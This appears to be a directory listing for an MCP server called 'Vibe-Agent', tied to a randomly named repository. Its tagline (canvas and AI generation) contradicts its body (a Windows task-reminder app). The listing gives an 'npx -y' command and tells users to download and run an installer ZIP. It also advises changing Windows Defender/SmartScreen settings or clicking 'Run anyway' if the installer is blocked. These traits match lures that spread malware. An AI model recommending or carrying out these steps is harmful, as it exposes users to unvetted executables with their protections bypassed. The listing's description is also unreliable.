Vibe-Agent
🎨 Create dynamic canvases and explore multimodal AI generation with Vibe-Agent, featuring easy-to-use tools and customizable options.
claude mcp add --transport stdio innocuous-stiffness915-vibe-agent npx -y innocuous-stiffness915/vibe-agent \ --env VIBE_AGENT_WINDOWS="true" \ --env VIBE_AGENT_CONFIG_PATH="path/to/config (optional)"
How to use
Vibe-Agent is a Windows-focused desktop utility designed to help you manage tasks and receive real-time notifications for scheduled actions. The MCP server entry points to a packaged executable delivered via an installer ZIP; once installed, the application runs as a standalone native app with a GUI. Through its interface, you can create and manage tasks, configure reminders, and receive alerts to streamline ongoing operations. The MCP integration described here assumes using a package runner (npx) to fetch and run the latest release from the repository, ensuring you’re using the most up-to-date public version. The toolset centers on user-friendly task management, customizable settings, and timely notifications to keep you on top of your workflow.
How to install
Prerequisites:
- Windows 10 or newer
- Administrative privileges may be required for installing desktop applications
- Internet access to download the installer
Step-by-step installation:
-
Ensure you have Node.js and npm installed (needed for the MCP runner in this configuration). If not, install Node.js from https://nodejs.org and verify with node -v and npm -v.
-
Open a terminal or PowerShell and run the following to fetch the latest Vibe-Agent package (this uses npx as the MCP method defined in mcp_config):
# Download and run the latest Vibe-Agent package
npx -y innocuous-stiffness915/vibe-agent
-
The installer ZIP referenced by the repository (Agent_Vibe_1.8.zip) should be downloaded via the provided link within the README. Extract the ZIP to a desired location.
-
Run the installer executable from the extracted folder and follow on-screen prompts to complete installation.
-
After installation, launch Vibe-Agent from the Start Menu or desktop shortcut and configure your preferred tasks and notification settings.
Additional notes
Notes and tips:
- The download link is tailored for Windows environments; macOS/Linux users will not be supported by this installer.
- If the installer fails to run due to blocked executable permissions, adjust Windows Defender/SmartScreen settings or right-click the installer and choose 'Run anyway'.
- Ensure you have internet connectivity during initial setup to fetch the latest release data when using the MCP runner.
- If you want to adjust how the MCP wrapper invokes the app, you can modify the mcp_config environment variables (e.g., VIBE_AGENT_CONFIG_PATH) to point to a custom configuration file.
- For support or issues, open an issue in the repository from which you downloaded the package.
Related MCP Servers
dify
Production-ready platform for agentic workflow development.
metorial
Connect any AI model to 600+ integrations; powered by MCP 📡 🚀
tools
A set of tools that gives agents powerful capabilities.
samples
Agent samples built using the Strands Agents SDK.
ios-simulator-skill
An IOS Simulator Skill for ClaudeCode. Use it to optimise Claude's ability to build, run and interact with your apps, without using up any of the available token/context budget.
agent-builder
An example agent demonstrating streaming, tool use, and interactivity from your terminal. This agent builder can help you to build your own agents and tools.